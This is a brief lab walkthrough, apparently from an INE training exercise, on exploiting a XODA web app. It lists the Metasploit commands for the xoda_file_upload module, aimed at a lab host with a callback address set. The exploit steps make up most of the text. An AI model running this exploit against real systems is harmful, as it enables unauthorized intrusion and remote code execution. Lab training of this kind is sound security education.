Misc Vulnerabilies

XODA web app

As mentioned in the challenge, a XODA web app instance is running on the system which can be exploited using the “exploit/unix/webapp/xoda_file_upload” Metasploit module.

use exploit/unix/webapp/xoda_file_upload
set RHOSTS demo1.ine.local
set TARGETURI /
set LHOST 192.63.4.2
exploit

Last updated